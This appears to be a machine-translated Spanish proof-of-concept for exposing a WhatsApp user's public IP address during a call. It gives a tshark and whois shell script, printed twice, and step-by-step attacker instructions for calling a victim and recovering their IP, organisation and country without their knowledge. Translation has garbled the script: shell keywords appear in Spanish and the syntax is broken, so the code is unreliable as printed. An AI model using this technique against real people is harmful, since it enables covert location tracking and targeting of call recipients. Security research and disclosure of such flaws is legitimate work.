Este programa es solo para fines educativos. No lo use sin permiso. Se aplica el descargo de responsabilidad habitual, especialmente el hecho de que yo (Bhdresh) no es responsable de los daños causados por el uso directo o indirecto de la información o funcionalidad proporcionada por estos programas. El autor o cualquier proveedor de Internet no tiene responsabilidad por el contenido o el mal uso de estos programas o cualquier derivada de los mismos. Al utilizar este programa, acepta el hecho de que cualquier daño (DataLoss, bloqueo del sistema, compromiso del sistema, etc.) causado por el uso de estos programas no es responsabilidad de Bhdresh.
Finalmente, este es un desarrollo personal, ¡respeta su filosofía y no la uses para cosas malas!
https://vimeo.com/577355374
La última versión de la aplicación WhatsApp en todas las plataformas es vulnerable a la divulgación remota de IP pública del usuario de WhatsApp.
Se observa que durante una llamada de WhatsApp (voz / video), la aplicación en el lado de la persona que llama intenta establecer una conexión directa con la dirección IP pública del dispositivo destinatario. Al filtrar las direcciones IP del servidor de Facebook y WhatsApp desde los hosts de destino, es posible revelar la dirección IP pública correcta del usuario de WhatsApp de destino sin su conocimiento.
El siguiente es un script rápido para explotar esta vulnerabilidad,
#!/bin/sh
filtre = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Presione Entrar y llamar a su objetivo".
línea de lectura
tshark -i eth0 -l -t campos -f "Udp" -e ip.dst -y "$ filtre" -y "ip.dst! = 192.168.0.0/16 e ip.dst! = 10.0.0.0/8 y ip.dst! = 172.16.0.0/12 "| Mientras lea línea do whois $ line> /tmp /b
filtro = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
if ["$ filtro" -gt 0]; Entonces TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi hecho
La posibilidad de asignar a los usuarios de WhatsApp con su IP pública no solo revelará la información de ubicación de los usuarios de WhatsApp, sino que también se puede usar mal para rastrear su movimiento físico manteniendo el historial de ubicación. Dicha asignación directa entre la información del usuario y la IP también se puede usar mal para rastrear los hábitos de surf de los usuarios e influir en él.
Además, la IP pública podría ser explotada para lanzar ataques dirigidos hacia el hogar u oficina de usuarios de WhatsApp.
Usuarios: UserA IS tiene detalles de whatsapp de userb
Medio ambiente: N/A
Navegador: n/a
Versión de la aplicación: <= Última versión de la aplicación WhatsApp en cualquier plataforma
OS: todas las plataformas excepto la web
Descripción: UserA hace una llamada de WhatsApp a UserB y captura su información pública de IP sin el conocimiento de UserB. Video POC para una mejor comprensión de los pasos: https://vimeo.com/577355374
Paso 1: Inicie el punto de acceso WiFi en la máquina del atacante y conecte el teléfono del atacante al atacante SSID
Paso 2: Inicie el script POC (a continuación) en la máquina atacante que ahora está actuando como un enrutador para el teléfono del atacante
#!/bin/sh
filtre = tshark -i eth0 -T fields -f "udp" -e ip.dst -Y "ip.dst!=192.168.0.0/16 and ip.dst!=10.0.0.0/8 and ip.dst!=172.16.0.0/12" -c 100 |sort -u |xargs|sed "s/ / and ip.dst!=/g" |sed "s/^/ip.dst!=/g"
Echo "Presione Entrar y llamar a su objetivo".
línea de lectura
tshark -i eth0 -l -t campos -f "Udp" -e ip.dst -y "$ filtre" -y "ip.dst! = 192.168.0.0/16 e ip.dst! = 10.0.0.0/8 y ip.dst! = 172.16.0.0/12 "| Mientras lea línea do whois $ line> /tmp /b
filtro = cat /tmp/b |xargs| egrep -iv "facebook|google"|wc -l
if ["$ filtro" -gt 0]; Entonces TargetInfo = cat /tmp/b| egrep -iw "OrgName:|NetName:|Country:"
echo $ line --- $ targetinfo fi hecho
Paso 3: llame al usuario de WhatsApp al azar para capturar las direcciones IP del servidor para filtrar
Paso 4: Llame a la víctima en su whatsapp
Paso 5: Desconecte la llamada una vez establecida
Paso 6: El guión revelará la dirección IP pública del objetivo
Paso 7: valida la dirección IP pública en el teléfono objetivo